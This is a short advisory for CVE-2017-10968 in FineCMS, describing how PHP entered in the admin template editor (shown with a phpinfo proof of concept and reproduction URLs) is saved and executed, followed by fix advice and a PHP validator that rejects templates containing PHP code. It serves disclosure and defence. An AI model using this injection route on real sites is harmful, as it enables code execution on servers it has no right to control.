andrzuk/FineCMS before 2017-07-06 is vulnerable to code execution in a web page

CVE-ID: CVE-2017-10968

#Bug info

There is a code execution vulnerability in the FineCMS admin page when a user inputs:

<?php phpinfo(); ?>

The vulnerable code is in application\core\controller\template.php

The code execution occurs in the http://localhost/templates/pages/default.php page.

Step 1

http://localhost/index.php?route=admin

http://localhost/index.php?route=template

Save.

Step 2


http://localhost/templates/pages/default.php

Fix bug

1. Turn off this feature; 2. Verify input.
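
One way to implement the "Verify input" fix, as an added example that is not FineCMS code: before the template editor saves a submission, refuse any content that PHP's tokenizer would treat as code. The function name `find_php_in_template` is hypothetical, and the check assumes templates are meant to hold static HTML only.

```php
<?php
// Added example, not FineCMS code. Assumption: page templates are meant to
// hold static HTML only, so any PHP in a submitted template is refused.
// Requires the tokenizer extension (enabled by default in PHP).

/**
 * Return the reasons a submitted template must not be written to a file the
 * web server executes as PHP. An empty array means the content is accepted.
 */
function find_php_in_template(string $content): array
{
    $problems = [];

    // "<?" opens PHP wherever short_open_tag is on, so refuse it regardless
    // of how this particular host is configured.
    if (strpos($content, '<?') !== false) {
        $problems[] = 'contains a "<?" open tag';
    }

    // Static HTML tokenizes to T_INLINE_HTML only. Anything else means the
    // tokenizer entered PHP mode through an open-tag form this build accepts.
    foreach (token_get_all($content) as $token) {
        if (!is_array($token) || $token[0] !== T_INLINE_HTML) {
            $name = is_array($token) ? token_name($token[0]) : $token;
            $problems[] = "PHP token {$name} found";
            break;
        }
    }

    return $problems;
}

// Constructed sample submissions: plain HTML, and the input from this advisory.
$samples = [
    'static html'    => "<h1>Welcome</h1>\n<p>Hello</p>",
    'advisory input' => '<?php phpinfo(); ?>',
];

foreach ($samples as $label => $content) {
    $problems = find_php_in_template($content);
    $verdict  = $problems ? 'REJECT: ' . implode('; ', $problems) : 'accept';
    echo "{$label}: {$verdict}\n";
}
```

The check belongs on the server side of the save request, before anything is written under templates/pages/.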